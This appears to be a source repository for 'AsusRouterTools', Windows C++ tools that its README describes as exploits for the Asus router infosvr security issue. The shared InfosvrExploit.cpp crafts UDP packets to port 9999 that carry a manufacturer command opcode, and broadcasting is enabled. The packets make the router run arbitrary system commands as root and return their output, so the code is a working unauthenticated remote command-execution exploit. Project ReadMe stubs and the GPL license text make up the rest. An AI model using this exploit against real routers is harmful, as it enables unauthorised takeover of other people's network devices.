├── AsusCmd
├── stdafx.h
├── AsusCmd.cpp
├── stdafx.cpp
├── targetver.h
├── AsusCmd.vcxproj.user
├── AsusCmd.vcxproj.filters
├── ReadMe.txt
└── AsusCmd.vcxproj
├── AsusBinWrite
├── stdafx.h
├── resource.h
├── stdafx.cpp
├── targetver.h
├── AsusBinWrite.aps
├── AsusBinWrite.cpp
├── AsusBinWrite.rc
├── AsusBinWrite.vcxproj.user
├── ReadMe.txt
├── AsusBinWrite.vcxproj.filters
└── AsusBinWrite.vcxproj
├── AsusDiscover
├── stdafx.h
├── stdafx.cpp
├── targetver.h
├── AsusDiscover.cpp
├── AsusDiscover.vcxproj.user
├── AsusDiscover.vcxproj.filters
├── ReadMe.txt
└── AsusDiscover.vcxproj
├── README.md
├── Common
├── includes
│ ├── InfosvrDefines.h
│ ├── InfosvrExploit.h
│ └── iboxcomh_piece.h
└── sources
│ └── InfosvrExploit.cpp
├── AsusRouterTools.sln
└── LICENSE
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1 | # AsusRouterTools
2 | The Asus routers infosvr security issue exploits for Windows
3 |
4 | Inspired by @jduck [asus-cmd](https://github.com/jduck/asus-cmd)
5 |
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1 | #define PORT_LOCAL 9999
2 | #define PORT_TARGET 9999
3 |
4 | #define INFO_PDU_LENGTH 512 // UDP pkt data size
5 | #define MAXINFOSVRCMD 238 // infosvr crash-safe cmd len
6 | #define MAXSYSCMD 256 // infosvr truncate cmd to this len
7 | #define SYSCMDBUF_MAX 420 // data buffer size in UDP pkt
8 | #define SYSCMDBUF_RES_MAX 420 // data buffer size in UDP pkt
9 |
10 | #define RECV_MAX 3 // max packets to receive (3 max responses)
11 |
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1 | #include "iboxcomh_piece.h"
2 |
3 | #define RES_LOST_MARK "LOST"
4 |
5 | enum ExecCmdFlags
6 | {
7 | EC_FLAG_NOFLAG = 0,
8 | EC_FLAG_VERBOSE = 1,
9 | EC_FLAG_RESONLY = 2,
10 | EC_FLAG_SILENT = 4
11 | };
12 |
13 | BOOL verifyCmdSizeOK(int cmdLen);
14 | BOOL setupNetworking(char* targetIP, SOCKET* sock, SOCKADDR_IN* localAddr, SOCKADDR_IN* targetAddr);
15 | char* getResponse(IBOX_COMM_PKT_HDR_EX* phdr_ex, SOCKET sock, SOCKADDR_IN* targetAddr, int timeout_ms, int ec_flags);
16 | char* execSysCmd(char* cmdline, SOCKET sock, SOCKADDR_IN* targetAddr, int timeout_ms, int ec_flags);
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2 | КОНСОЛЬНОЕ ПРИЛОЖЕНИЕ. Обзор проекта AsusCmd
3 | ========================================================================
4 |
5 | Это приложение AsusCmd создано автоматически с помощью мастера приложений.
6 |
7 | В этом файле представлена сводка содержимого всех файлов, входящих в состав приложения AsusCmd.
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10 | AsusCmd.vcxproj
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18 |
19 | /////////////////////////////////////////////////////////////////////////////
20 | Другие стандартные файлы:
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22 | StdAfx.h, StdAfx.cpp
23 | Эти файлы используются для построения файла предкомпилированного заголовка (PCH) с именем AsusCmd.pch и файла предкомпилированных типов с именем StdAfx.obj.
24 |
25 | /////////////////////////////////////////////////////////////////////////////
26 | Прочие примечания.
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28 | С помощью комментариев «TODO:» в мастере приложений обозначаются фрагменты исходного кода, которые необходимо дополнить или изменить.
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1 | ========================================================================
2 | КОНСОЛЬНОЕ ПРИЛОЖЕНИЕ. Обзор проекта AsusBinWrite
3 | ========================================================================
4 |
5 | Это приложение AsusBinWrite создано автоматически с помощью мастера приложений.
6 |
7 | В этом файле представлена сводка содержимого всех файлов, входящих в состав приложения AsusBinWrite.
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14 | Это файл фильтров для проектов VC++, созданный с помощью мастера приложений. Он содержит сведения о сопоставлениях между файлами в вашем проекте и фильтрами. Эти сопоставления используются в среде IDE для группировки файлов с одинаковыми расширениями в одном узле (например CPP-файлы сопоставляются с фильтром "Исходные файлы").
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16 | AsusBinWrite.cpp
17 | Это основной исходный файл приложения.
18 |
19 | /////////////////////////////////////////////////////////////////////////////
20 | Другие стандартные файлы:
21 |
22 | StdAfx.h, StdAfx.cpp
23 | Эти файлы используются для построения файла предкомпилированного заголовка (PCH) с именем AsusBinWrite.pch и файла предкомпилированных типов с именем StdAfx.obj.
24 |
25 | /////////////////////////////////////////////////////////////////////////////
26 | Прочие примечания.
27 |
28 | С помощью комментариев «TODO:» в мастере приложений обозначаются фрагменты исходного кода, которые необходимо дополнить или изменить.
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1 | ========================================================================
2 | КОНСОЛЬНОЕ ПРИЛОЖЕНИЕ. Обзор проекта AsusDiscover
3 | ========================================================================
4 |
5 | Это приложение AsusDiscover создано автоматически с помощью мастера приложений.
6 |
7 | В этом файле представлена сводка содержимого всех файлов, входящих в состав приложения AsusDiscover.
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14 | Это файл фильтров для проектов VC++, созданный с помощью мастера приложений. Он содержит сведения о сопоставлениях между файлами в вашем проекте и фильтрами. Эти сопоставления используются в среде IDE для группировки файлов с одинаковыми расширениями в одном узле (например CPP-файлы сопоставляются с фильтром "Исходные файлы").
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17 | Это основной исходный файл приложения.
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19 | /////////////////////////////////////////////////////////////////////////////
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1 | #pragma once
2 |
3 | //Packet Type Section
4 | #define NET_SERVICE_ID_BASE (10)
5 | #define NET_SERVICE_ID_LPT_EMU (NET_SERVICE_ID_BASE + 1)
6 | #define NET_SERVICE_ID_IBOX_INFO (NET_SERVICE_ID_BASE + 2)
7 |
8 | //Packet Type Section
9 | #define NET_PACKET_TYPE_BASE (20)
10 | #define NET_PACKET_TYPE_CMD (NET_PACKET_TYPE_BASE + 1)
11 | #define NET_PACKET_TYPE_RES (NET_PACKET_TYPE_BASE + 2)
12 |
13 | //Command ID Section
14 | enum NET_CMD_ID
15 | { // Decimal Hexadecimal
16 | NET_CMD_ID_BASE = 30, // 30 0x1E
17 | NET_CMD_ID_GETINFO, // 31 0x1F
18 | NET_CMD_ID_GETINFO_EX, // 32 0x20
19 | NET_CMD_ID_GETINFO_SITES, // 33 0x21
20 | NET_CMD_ID_SETINFO, // 34 0x22
21 | NET_CMD_ID_SETSYSTEM, // 35 0x23
22 | NET_CMD_ID_GETINFO_PROF, // 36 0x24
23 | NET_CMD_ID_SETINFO_PROF, // 37 0x25
24 | NET_CMD_ID_CHECK_PASS, // 38 0x26
25 | //#ifdef BTN_SETUP
26 | NET_CMD_ID_SETKEY_EX, // 39 0x27
27 | NET_CMD_ID_QUICKGW_EX, // 40 0x28
28 | NET_CMD_ID_EZPROBE, // 41 0x29
29 | //#endif
30 | NET_CMD_ID_MANU_BASE=50, // 50 0x32
31 | NET_CMD_ID_MANU_CMD, // 51 0x33
32 | NET_CMD_ID_GETINFO_MANU, // 52 0x34
33 | NET_CMD_ID_GETINFO_EX2, // 53 0x35
34 | NET_CMD_ID_MAXIMUM
35 | };
36 |
37 | #pragma pack(1)
38 | //Packet Header Structure
39 | typedef struct iboxPKTRes
40 | {
41 | BYTE ServiceID;
42 | BYTE PacketType;
43 | WORD OpCode;
44 | DWORD Info; // Or Transaction ID
45 | } IBOX_COMM_PKT_RES;
46 |
47 | typedef struct iboxPKTEx
48 | {
49 | BYTE ServiceID;
50 | BYTE PacketType;
51 | WORD OpCode;
52 | DWORD Info; // Or Transaction ID
53 | BYTE MacAddress[6];
54 | BYTE Password[32]; //NULL terminated string, string length:1~31, cannot be NULL string
55 | } IBOX_COMM_PKT_HDR_EX;
56 |
57 | typedef struct iboxPKTExRes
58 | {
59 | BYTE ServiceID;
60 | BYTE PacketType;
61 | WORD OpCode;
62 | DWORD Info; // Or Transaction ID
63 | BYTE MacAddress[6];
64 | } IBOX_COMM_PKT_RES_EX;
65 |
66 | //Extended Fields Definition
67 | typedef struct PktGetInfo
68 | {
69 | BYTE PrinterInfo[128];
70 | BYTE SSID[32];
71 | BYTE NetMask[32];
72 | BYTE ProductID[32];
73 | BYTE FirmwareVersion[16];
74 | BYTE OperationMode;
75 | BYTE MacAddress[6];
76 | BYTE Regulation;
77 | } PKT_GET_INFO;
78 |
79 | typedef struct iboxPKTCmd
80 | {
81 | WORD len;
82 | BYTE cmd[420]; // max command size (but, will be truncated to MAXSYSCMD size)
83 | } PKT_SYSCMD; // total 422 bytes
84 |
85 | typedef struct iboxPKTCmdRes
86 | {
87 | WORD len;
88 | BYTE res[420]; // max response size
89 | } PKT_SYSCMD_RES; // total 422 bytes
90 | #pragma pack()
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1 | #include
2 | #include
3 | #include
4 | #include
5 | #include "..\includes\InfosvrDefines.h"
6 | #include "..\includes\iboxcomh_piece.h"
7 | #include "..\includes\InfosvrExploit.h"
8 |
9 | BOOL verifyCmdSizeOK(int cmdLen)
10 | {
11 | if (cmdLen > MAXINFOSVRCMD)
12 | {
13 | printf_s("\nCommand size (%d chars) exceeds max safe infosvr command size (%d chars).\n", cmdLen, MAXINFOSVRCMD);
14 | printf_s("Command will be executed but infosvr will crash. Continue? ('y' - yes): ");
15 | int answer = _getch();
16 | printf_s("%c\n", answer);
17 | if (answer != 'y' && answer != 'Y')
18 | {
19 | return FALSE;
20 | }
21 | }
22 | return TRUE;
23 | }
24 |
25 | BOOL setupNetworking(char* targetIP, SOCKET* sock, SOCKADDR_IN* localAddr, SOCKADDR_IN* targetAddr)
26 | {
27 | WSADATA wsadata;
28 | if (WSAStartup(MAKEWORD(2,2), &wsadata) != NO_ERROR) // init WSA
29 | {
30 | perror("WSAStartup() failed!\n");
31 | exit(EXIT_FAILURE);
32 | }
33 |
34 | *sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); // work socket
35 | if (*sock == INVALID_SOCKET)
36 | {
37 | char wsaErr[8];
38 | sprintf_s(wsaErr, sizeof(wsaErr), "%d", WSAGetLastError());
39 | printf_s("\nFailed to create SOCKET.\tWSA error: %s\n", wsaErr);
40 | char system_cmd[80];
41 | sprintf_s(system_cmd, sizeof(system_cmd), "net helpmsg %s", wsaErr);
42 | system(system_cmd);
43 |
44 | WSACleanup();
45 | exit(EXIT_FAILURE);
46 | }
47 | setsockopt(*sock, SOL_SOCKET, SO_BROADCAST, "ON", sizeof(int)); // to enable broadcast sending
48 |
49 | localAddr->sin_family = AF_INET;
50 | localAddr->sin_port = htons(PORT_LOCAL);
51 | localAddr->sin_addr.s_addr = INADDR_ANY; // receive on any interface
52 | if (bind(*sock, (SOCKADDR*)localAddr, sizeof(*localAddr)) == SOCKET_ERROR) // set local address for socket
53 | {
54 | char wsaErr[8];
55 | sprintf_s(wsaErr, sizeof(wsaErr), "%d", WSAGetLastError());
56 | printf_s("\nFailed to bind SOCKET.\tWSA error: %s\n", wsaErr);
57 | char system_cmd[80];
58 | sprintf_s(system_cmd, sizeof(system_cmd), "net helpmsg %s", wsaErr);
59 | system(system_cmd);
60 |
61 | closesocket(*sock);
62 | WSACleanup();
63 | exit(EXIT_FAILURE);
64 | }
65 |
66 | targetAddr->sin_family = AF_INET;
67 | targetAddr->sin_port = htons(PORT_TARGET);
68 | targetAddr->sin_addr.s_addr = inet_addr(targetIP);
69 |
70 | return TRUE;
71 | }
72 |
73 | char* getResponse(IBOX_COMM_PKT_HDR_EX* phdr_ex, SOCKET sock, SOCKADDR_IN* targetAddr, int timeout_ms, int ec_flags)
74 | {
75 | IBOX_COMM_PKT_RES_EX responses[RECV_MAX]; // headers of responses
76 | memset(responses, 0, sizeof(responses));
77 | fd_set fdSet;
78 | TIMEVAL timVal;
79 | timVal.tv_sec = 0;
80 | timVal.tv_usec = timeout_ms*1000;
81 |
82 | char pdubuf_res[INFO_PDU_LENGTH]; // receive buffer
83 | IBOX_COMM_PKT_RES_EX *phdr_res = (IBOX_COMM_PKT_RES_EX*)pdubuf_res; // receive buffer header
84 | PKT_SYSCMD_RES *syscmd_res = (PKT_SYSCMD_RES*)(pdubuf_res+sizeof(IBOX_COMM_PKT_RES_EX)); // receive buffer body
85 |
86 | static char resBuf[SYSCMDBUF_RES_MAX+1] = ""; // response text (not thread-safe)
87 | BOOL resGot = FALSE;
88 |
89 | for (int i = 0; i < RECV_MAX; i++)
90 | {
91 | FD_ZERO(&fdSet);
92 | FD_SET(sock, &fdSet);
93 | int sss = select(NULL, &fdSet, NULL, NULL, &timVal); // socket select status
94 | if (sss == SOCKET_ERROR) // ERROR
95 | {
96 | char wsaErr[8];
97 | sprintf_s(wsaErr, sizeof(wsaErr), "%d", WSAGetLastError());
98 | printf_s("\ngetResponse(): Error checking SOCKET status.\tWSA error: %s\n", wsaErr);
99 | char system_cmd[80];
100 | sprintf_s(system_cmd, sizeof(system_cmd), "net helpmsg %s", wsaErr);
101 | system(system_cmd);
102 |
103 | closesocket(sock);
104 | WSACleanup();
105 | exit(EXIT_FAILURE);
106 | }
107 | else if (sss == NULL) // TIMEOUT (No packets)
108 | {
109 | if (i == RECV_MAX-1 && !(ec_flags&EC_FLAG_SILENT) && !(ec_flags&EC_FLAG_RESONLY))
110 | {
111 | printf_s(RES_LOST_MARK);
112 | }
113 | if (i == RECV_MAX-1) // if last try
114 | {
115 | strcpy_s(resBuf, sizeof(resBuf), RES_LOST_MARK);
116 | }
117 | continue; // wait other responses
118 | //break; // do not wait other responses
119 | }
120 | // OK, packet available
121 | sss = sizeof(*targetAddr);
122 | int recvLen = recvfrom(sock, pdubuf_res, sizeof(pdubuf_res), 0, (SOCKADDR*)targetAddr, &sss); // receive response
123 | if (recvLen == SOCKET_ERROR)
124 | {
125 | char wsaErr[8];
126 | sprintf_s(wsaErr, sizeof(wsaErr), "%d", WSAGetLastError());
127 | printf_s("\ngetResponse(): Failed to receive data through SOCKET.\tWSA error: %s\n", wsaErr);
128 | char system_cmd[80];
129 | sprintf_s(system_cmd, sizeof(system_cmd), "net helpmsg %s", wsaErr);
130 | system(system_cmd);
131 |
132 | closesocket(sock);
133 | WSACleanup();
134 | exit(EXIT_FAILURE);
135 | }
136 |
137 | if (phdr_res->ServiceID == NET_SERVICE_ID_IBOX_INFO && phdr_res->OpCode == NET_CMD_ID_MANU_CMD)
138 | {
139 | if (phdr_res->PacketType == NET_PACKET_TYPE_CMD) // usually our broadcast packet
140 | {
141 | i--; // to receive other RIGHT packet instead
142 | //if (!(ec_flags&EC_FLAG_SILENT) && !(ec_flags&EC_FLAG_RESONLY)) printf_s("%c", 253); // received our broadcast packet
143 | continue; // get next
144 | }
145 | else if (phdr_res->PacketType == NET_PACKET_TYPE_RES) // response
146 | {
147 | if (phdr_res->Info != phdr_ex->Info)
148 | { // unexpected packet (usually from previous transactions)
149 | i--; // to receive other RIGHT packet instead
150 | if (!(ec_flags&EC_FLAG_SILENT) && !(ec_flags&EC_FLAG_RESONLY)) printf_s("%c", 249);
151 | continue; // get next
152 | }
153 |
154 | BOOL bNewInfo = TRUE;
155 | for (int j = 0; j < RECV_MAX; j++) // maybe such packet already received?
156 | {
157 | if (responses[j].Info == phdr_res->Info &&
158 | memcmp(responses[j].MacAddress, phdr_res->MacAddress, sizeof(phdr_res->MacAddress)) == 0)
159 | { // if already received
160 | if (!(ec_flags&EC_FLAG_SILENT) && !(ec_flags&EC_FLAG_RESONLY)) printf_s("%c", 254); // print 'duplicate' sign
161 | bNewInfo = FALSE;
162 | break;
163 | }
164 | }
165 |
166 | if (bNewInfo)
167 | {
168 | int resLen; // different firmware return response length in different byte order
169 | if (syscmd_res->len > SYSCMDBUF_RES_MAX)
170 | {
171 | if (ntohs(syscmd_res->len) > SYSCMDBUF_RES_MAX)
172 | { // bad if it happens
173 | resLen = SYSCMDBUF_RES_MAX;
174 | }
175 | else
176 | {
177 | resLen = ntohs(syscmd_res->len); // network byte order (stock firmware?)
178 | }
179 | }
180 | else
181 | {
182 | resLen = syscmd_res->len; // normal byte order (AsusWRT firmware?)
183 | }
184 |
185 | memcpy_s(resBuf, sizeof(resBuf), syscmd_res->res, resLen);
186 | resBuf[resLen] = '\0';
187 | resGot = TRUE;
188 |
189 | if (!(ec_flags&EC_FLAG_SILENT))
190 | {
191 | printf_s("%s", resBuf); // print command output
192 | }
193 |
194 | if (!(ec_flags&EC_FLAG_SILENT) && !(ec_flags&EC_FLAG_RESONLY))
195 | {
196 | if (resLen >= SYSCMDBUF_RES_MAX)
197 | {
198 | printf_s("\nResponse from %s (%d chars - %c).\n", inet_ntoa(targetAddr->sin_addr), resLen, 19); // command output may be truncated
199 | }
200 | else
201 | {
202 | printf_s("\nResponse from %s (%d chars).\n", inet_ntoa(targetAddr->sin_addr), resLen);
203 | }
204 | }
205 |
206 | responses[i].Info = phdr_res->Info; // save response ID
207 | memcpy_s(responses[i].MacAddress, sizeof(responses[i].MacAddress),
208 | phdr_res->MacAddress, sizeof(phdr_res->MacAddress));// save response MacAddress
209 |
210 | if (!(ec_flags&EC_FLAG_SILENT) && !(ec_flags&EC_FLAG_RESONLY) && (ec_flags&EC_FLAG_VERBOSE))
211 | {
212 | printf_s("\n\t[Verbose info]:\n");
213 | printf_s("phdr_res->ServiceID\t= 0x%.2x\t(%d)\n", phdr_res->ServiceID, phdr_res->ServiceID);
214 | printf_s("phdr_res->PacketType\t= 0x%.2x\t(%d)\n", phdr_res->PacketType, phdr_res->PacketType);
215 | printf_s("phdr_res->OpCode\t= 0x%.4x\t(%d)\n", phdr_res->OpCode, phdr_res->OpCode);
216 | printf_s("phdr_res->Info\t\t= 0x%.8x\t(%d)\n", phdr_res->Info, phdr_res->Info);
217 | printf_s("phdr_res->MacAddress \t= %.2x:%.2x:%.2x:%.2x:%.2x:%.2x\n",
218 | phdr_res->MacAddress[0],
219 | phdr_res->MacAddress[1],
220 | phdr_res->MacAddress[2],
221 | phdr_res->MacAddress[3],
222 | phdr_res->MacAddress[4],
223 | phdr_res->MacAddress[5]);
224 | }
225 | }
226 | }
227 | else
228 | { // unknown packet type
229 | if (!(ec_flags&EC_FLAG_SILENT) && !(ec_flags&EC_FLAG_RESONLY)) printf_s("%c", 15);
230 | continue; // get next
231 | }
232 | }
233 | else
234 | { // unknown service/cmd packet
235 | if (!(ec_flags&EC_FLAG_SILENT) && !(ec_flags&EC_FLAG_RESONLY)) printf_s("%c", 15);
236 | continue; // get next
237 | }
238 |
239 | if (resGot) // if response received - its no sense to wait its duplicates
240 | {
241 | break;
242 | }
243 | }
244 | return resBuf;
245 | }
246 |
247 | char* execSysCmd(char* cmdline, SOCKET sock, SOCKADDR_IN* targetAddr, int timeout_ms, int ec_flags)
248 | {
249 | char pdubuf[INFO_PDU_LENGTH]; // output buffer
250 | memset(pdubuf, 0, sizeof(pdubuf));
251 | IBOX_COMM_PKT_HDR_EX *phdr_ex = (IBOX_COMM_PKT_HDR_EX*)pdubuf; // output buffer header
252 | phdr_ex->ServiceID = NET_SERVICE_ID_IBOX_INFO; // MUST be such
253 | phdr_ex->PacketType = NET_PACKET_TYPE_CMD; // MUST be such
254 | phdr_ex->OpCode = NET_CMD_ID_MANU_CMD; // to exec system commands
255 | PKT_SYSCMD *syscmd = (PKT_SYSCMD*)(pdubuf+sizeof(IBOX_COMM_PKT_HDR_EX)); // output buffer body
256 |
257 | strcpy_s((char*)syscmd->cmd, sizeof(syscmd->cmd), cmdline); // place cmdline to buffer
258 | syscmd->len = strlen((char*)syscmd->cmd); // cmdline length
259 |
260 | if (!verifyCmdSizeOK(syscmd->len))
261 | {
262 | closesocket(sock);
263 | WSACleanup();
264 | exit(EXIT_FAILURE);
265 | }
266 |
267 | phdr_ex->Info = clock();
268 | if (!(ec_flags&EC_FLAG_SILENT) && !(ec_flags&EC_FLAG_RESONLY))
269 | printf_s("Sending to %s command (%d chars):\n\nroot:/# %s\n", inet_ntoa(targetAddr->sin_addr), syscmd->len, syscmd->cmd);
270 | int nSent = sendto(sock, pdubuf, sizeof(pdubuf), 0, (SOCKADDR*)targetAddr, sizeof(*targetAddr)); // send cmd
271 | if (nSent == SOCKET_ERROR)
272 | {
273 | char wsaErr[8];
274 | sprintf_s(wsaErr, sizeof(wsaErr), "%d", WSAGetLastError());
275 | printf_s("\nuploadFile(): Failed to send data through SOCKET.\tWSA error: %s\n", wsaErr);
276 | char system_cmd[80];
277 | sprintf_s(system_cmd, sizeof(system_cmd), "net helpmsg %s", wsaErr);
278 | system(system_cmd);
279 |
280 | closesocket(sock);
281 | WSACleanup();
282 | exit(EXIT_FAILURE);
283 | }
284 |
285 | return getResponse(phdr_ex, sock, targetAddr, timeout_ms, ec_flags);
286 | }
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250 | 10. If you wish to incorporate parts of the Program into other free
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255 | of preserving the free status of all derivatives of our free software and
256 | of promoting the sharing and reuse of software generally.
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260 | 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY
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265 | MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS
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267 | PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING,
268 | REPAIR OR CORRECTION.
269 |
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271 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR
272 | REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,
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279 |
280 | END OF TERMS AND CONDITIONS
281 |
282 | How to Apply These Terms to Your New Programs
283 |
284 | If you develop a new program, and you want it to be of the greatest
285 | possible use to the public, the best way to achieve this is to make it
286 | free software which everyone can redistribute and change under these terms.
287 |
288 | To do so, attach the following notices to the program. It is safest
289 | to attach them to the start of each source file to most effectively
290 | convey the exclusion of warranty; and each file should have at least
291 | the "copyright" line and a pointer to where the full notice is found.
292 |
293 | {description}
294 | Copyright (C) {year} {fullname}
295 |
296 | This program is free software; you can redistribute it and/or modify
297 | it under the terms of the GNU General Public License as published by
298 | the Free Software Foundation; either version 2 of the License, or
299 | (at your option) any later version.
300 |
301 | This program is distributed in the hope that it will be useful,
302 | but WITHOUT ANY WARRANTY; without even the implied warranty of
303 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
304 | GNU General Public License for more details.
305 |
306 | You should have received a copy of the GNU General Public License along
307 | with this program; if not, write to the Free Software Foundation, Inc.,
308 | 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
309 |
310 | Also add information on how to contact you by electronic and paper mail.
311 |
312 | If the program is interactive, make it output a short notice like this
313 | when it starts in an interactive mode:
314 |
315 | Gnomovision version 69, Copyright (C) year name of author
316 | Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
317 | This is free software, and you are welcome to redistribute it
318 | under certain conditions; type `show c' for details.
319 |
320 | The hypothetical commands `show w' and `show c' should show the appropriate
321 | parts of the General Public License. Of course, the commands you use may
322 | be called something other than `show w' and `show c'; they could even be
323 | mouse-clicks or menu items--whatever suits your program.
324 |
325 | You should also get your employer (if you work as a programmer) or your
326 | school, if any, to sign a "copyright disclaimer" for the program, if
327 | necessary. Here is a sample; alter the names:
328 |
329 | Yoyodyne, Inc., hereby disclaims all copyright interest in the program
330 | `Gnomovision' (which makes passes at compilers) written by James Hacker.
331 |
332 | {signature of Ty Coon}, 1 April 1989
333 | Ty Coon, President of Vice
334 |
335 | This General Public License does not permit incorporating your program into
336 | proprietary programs. If your program is a subroutine library, you may
337 | consider it more useful to permit linking proprietary applications with the
338 | library. If this is what you want to do, use the GNU Lesser General
339 | Public License instead of this License.
340 |
341 |
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